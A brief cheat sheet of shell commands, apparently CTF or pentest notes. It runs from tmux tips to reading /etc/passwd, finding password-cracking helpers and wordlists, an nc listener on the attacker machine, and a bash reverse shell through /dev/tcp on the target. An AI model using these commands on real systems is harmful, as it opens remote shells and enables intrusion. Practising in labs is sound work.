ctrl+b :
to enter tmux command prompt$ tmux split-window vim /etc/passwd
: swap-window -s 3 -t 0
ctrl+b t
to open clock
$ ls -lahR
(read permission, file size, recursively)$ wordlist
(path to wordlists)$ locate *2john
(what else john can do?)$ nc -l -p 12345
on attacker machine$ bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
on target machine$ find / -type f -iname '*flag*' 2>/dev/null
$ python -m SimpleHTTPServer 8000
$ ifconfig tun0